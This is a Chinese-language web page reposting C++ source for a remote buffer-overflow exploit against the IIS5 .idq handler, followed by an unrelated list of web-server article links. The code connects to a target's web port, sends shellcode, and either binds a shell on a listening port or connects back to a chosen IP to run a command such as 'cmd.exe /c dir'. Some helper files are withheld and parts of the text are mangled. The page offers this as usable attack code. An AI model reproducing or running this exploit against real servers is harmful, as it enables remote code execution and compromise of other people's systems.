|
Web服务器 | Windows | 1513 次查看 |
|---|---|---|
文件结构: cpp文件: iisidqoverflow.cpp 和 SkShellCodeFunc.cpp 头文件: SkShellCodeFunc.h 功能文件: WSAStart.cpp和SnakeSocket.cpp wsastart.h snakesocket.h(这4个文件不提供...因为,他们实现的只是WSAStart和socket的功能,你要成功编译本程序,必须自己替换相关的WSAStart和socket功能的代码.特此声明!) 中间文件: iis_idq.asm --用来实现shellcode数据的文件,编译的时候,不必编译,只是为了中间产生shellcode数据.它实现了溢出后,程序的处理:创建一个进程,并且绑定一个端口。这个还可以用于其他的windows溢出. 文件1:iisidqoverflow.cpp (主文件) #include #include "snakesocket.h" #include "wsastart.h" #include "SkShellCodeFunc.h" //function predeclare. //取得 需要 地址 信息 void GetNecesProcAddr( char *szInfo, int iMaxSize); //生成我的 shell code代码. int Sk_Make_IIS5_IDQ_ShellCode(char *pszOutput, SYSTEM_TYPE SystemType, ConnectStruct *pConnectStruct, LPCTSTR lpszBindCmd); //宣示帮助. void ShowHelp() { int i; printf("运行参数: 操作系统类型 目的地址 web端口 1 溢出监听端口 <输入命令1> "); printf(" 或者: 操作系统类型 目的地址 web端口 2 溢出连接IP 溢出连接端口 <输入命令1> "); printf(" 其中,如果输入命令参数没有输入,那么,默认为:"cmd.exe /c + dir""); printf(" 如果为1,那么,将输入新的命令."); printf(" 支持的操作系统 类型: ---- "); for( i=0; i 0){ send( msocket, szBuff, iLen, 0); } return (iLen>0)?true:false; } int main(int argc, char *argv[]) { CWSAStart wsaStart; CSnakeSocket snakeSocket; WORD wPort; DWORD dwIP; if( argc > 1){ if( stricmp( argv[1], "GetAddr") == 0){ char szTemp[12048]; GetNecesProcAddr(szTemp, sizeof(szTemp) ); printf("%s ",szTemp); OSVERSIONINFO osInfo; osInfo.dwOSVersionInfoSize = sizeof(OSVERSIONINFO); GetVersionEx( &osInfo); printf("Version: %d - %d. Build:%d. ID:%d [%s] ", osInfo.dwMajorVersion, osInfo.dwMinorVersion, osInfo.dwBuildNumber, osInfo.dwPlatformId, osInfo.szCSDVersion); return 0; } } if( argc < 5){ ShowHelp(); return 0; } wsaStart.StartUP(); SYSTEM_TYPE SystemType = (SYSTEM_TYPE)atoi(argv[1]); if( SystemType >= MAX_SYSTEM_TYPE_NUM){ printf("操作系统类型 不正确. "); ShowHelp(); return 0; } dwIP = snakeSocket.GetHostAddr( argv[2]); if( dwIP == 0){ printf("输入地址不对. "); return 0; } Sk_ConnectType connectType; ConnectStruct connectStruct; char szCommand[129]="cmd.exe /c dir c:\"; BOOL bInputCommand=false; connectType = (Sk_ConnectType)atoi(argv[4]); connectStruct.byConnectType = connectType; switch(connectType){ case LISTEN_ON_PORT: connectStruct.wListenPort = atoi(argv[5]); if( argc >= 7){ bInputCommand = true; } break; case CONNECT_TO_HOST: if( argc < 6){ printf("参数不足够. "); return 0; } connectStruct.dwConnectIP = snakeSocket.GetHostAddr(argv[5]); connectStruct.wConnectPort = atoi(argv[6]); if( argc >= 8){ bInputCommand = true; } break; default: printf("溢出类型不正确. "); return 0; } if( bInputCommand){ printf(" 请输入绑定的命令:"); scanf( "%s",szCommand); } snakeSocket.CreateSocket(); wPort = atoi(argv[3]); if( !snakeSocket.connect( argv[2], wPort)){ printf("连接目的机器 %s:%d 失败. ", argv[2], wPort); return 0; } else printf("连接目的机器 %s:%d OK. ", argv[2], wPort); BOOL bValue = SendIDQExploit( snakeSocket.m_Socket, SystemType, &connectStruct, szCommand); if( bValue){ printf( "发送shellcode 到 %s:%d OK ", argv[2], wPort); printf(" 现在,如果系统类型正确,并且漏洞存在,那么,应该 可以得到 [%s] 结果了...,good luck.!", szCommand); } else{ printf( "发送失败, 对方系统类型不支持 "); } snakeSocket.CloseSocket(); wsaStart.CleanUP(); return 0; } |
||
- 避免受虚假Web站点欺骗的步骤
- Windows2003上整合IIS6和Tomcat5
- 在WebService中使用属性发布一个方法
- 安全性与IIS
- 深入剖析WindowsIIS6.0(3)
- 基于IIS总线的嵌入式音频系统设计
- 用PWS建立自己的Web服务器
- IIS6.0服务器架站无法访问解决方案总结
- Frontpage服务器扩充程序
- web服务器环境的构建入门
- WindowsServer2003的Web接口问题
- 使用Delphi创建IIS虚拟目录的方法
- IIS服务器的备份和移植-IISExportUtility
- web集群服务的负载均衡方案选择与实现
- SQLServerXML和Web应用体系结构
- 影响IIS性能的几个因素
- 为脱机数据访问创建基于Web的应用程序
- 用IE的Web服务建立ASP.NET应用程序
- 加固WindowsServer2003IIS服务器(2)
- 在托管主机单网卡环境下进行web发布(二)
- 服务器端异步Web方法(三)
- 远程控制Web服务器
- win2003编写asp代码要注意的地方
- 创建Web部件显示PortalServer的搜索数据
- 用ASP编程来控制在IIS建立Web站点
- IIS5.1和IIS6.0一些显著的重要区别
- SQLServerXML和Web应用体系结构
- IIS5HTTP500内部错误解决办
- 安装IIS5.0DIY
- IIS服务中FTP站点的建立与维护(3)
- 使用WindowsXP及IIS5.1配置Web服务器
- 装IIS6.0后所有站都出现500错误
- 在Windows2003+IIS6.0环境下安装PHP
- IIS5.1和IIS6.0一些显著的重要区别
- 如何用Resin使IIS支持JSP和Servlet
- 基于IIS总线的嵌入式音频系统设计
- SMB架站入门:IBMHTTPServer图解
- 一个IP建多个Web站点---主机头名法
- 架构WebService:什么是Web服务?
- IIS服务中FTP站点的建立与维护(1)
- Windows2003上整合IIS6和Tomcat5
- 建立企业自己的Web网站
- WEB系统中加密解密URL传输参数
- 让Web站点适应WindowsXPServicePack2
- Win下配置Apache2,PHP5,MYSQL5,Zend
- 在Windows下安装功能强大的Apache服务器端Web软件
- 解决apacheWeb服务器网页显示乱码的两种方法
- Win2000ADV下配置Apache+PHP5+MySql5
- 如何简单完成定制WebBrowser控件
- Win2003下IIS6服务器设置排错解答
- 自己动手抠出2003中的IIS6安装程序
- 全程指导Windows下PHP环境配置
- JRun3.0配合IIS的安装全过程详解
- 在一个IP地址上配置多个Web站点应用
- 关于IIS连接数的几种解释
- Win2003web服务器无法上传大文件解决方法
- IIS操作失败诊断指南
- 为防火墙客户和Web代理客户配置自动发现
- 通过具体项目浅谈及实战WebService
- IIS6.0服务器架站无法访问解决方案总结
- 基于IIS的WEB服务器架建
- 装IIS6.0后所有站都出现500错误
- JRun3.0配合IIS的安装全过程详解
- 一个IP建多个Web站点---主机头名法
- 解决apacheWeb服务器网页显示乱码的两种方法
- 在一个IP地址上配置多个Web站点应用
- IIS6.0服务器架站无法访问解决方案总结
- 在Windows2003+IIS6.0环境下安装PHP
- 基于IIS总线的嵌入式音频系统设计
- 如何用Resin使IIS支持JSP和Servlet
- MobileInkJots3:在Web上写写画画
- 自己动手抠出2003中的IIS6安装程序
- 查看IIS里每个站点的资源使用情况
- Web接口远程维护Win2003服务器
- 关于IIS连接数的几种解释
- 在托管主机单网卡环境下进行web发布(二)
- 在托管主机单网卡环境下进行web发布(一)
- IIS5_IDQ命令行溢出程序源代码
- 为防火墙客户和Web代理客户配置自动发现
- WindowsServer2003的Web接口问题
- 让IISWeb服务器不再拒认ASP网页
- IIS6.0下ASP的一些新增加的功能
- 创建Web部件显示PortalServer的搜索数据
- 用SQLServer为Web浏览器提供图像(四)
- 用SQLServer为Web浏览器提供图像(三)
- 用SQLServer为Web浏览器提供图像(二)
- 用SQLServer为Web浏览器提供图像(一)
- 为脱机数据访问创建基于Web的应用程序
- 如何在Access2002中进行Web的具体开发
- Web开发中用sql语句完成分页的高效率方法